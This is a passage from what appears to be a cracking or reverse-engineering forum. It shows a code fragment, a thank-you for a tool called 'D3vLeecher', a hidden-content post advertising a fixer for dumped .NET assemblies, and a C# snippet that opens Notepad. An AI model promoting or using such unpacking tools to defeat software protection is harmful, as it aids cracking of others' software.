RT(processInfo[1]); } } catch { return false; } return true; } } [/HIDE-THANKS]
      23. 1 point
        Re: D3vLeecher V1.2 thanks friend're the best
      24. 1 point
        Universal Fixer fix dumps after dumping them whit Dotnet Dumper or other similiar tools and will also fix nasty things: multiple assembly/module definitions, wrong extends, etc. [hide][Hidden Content]]
      25. 1 point
        add >using System.Diagnostics; code: > private void button1_Click(object sender, EventArgs e) { string str = @"C:\windows\notepad.exe"; Process process = new Process(); process.StartInfo.FileName = str; process.Start(); }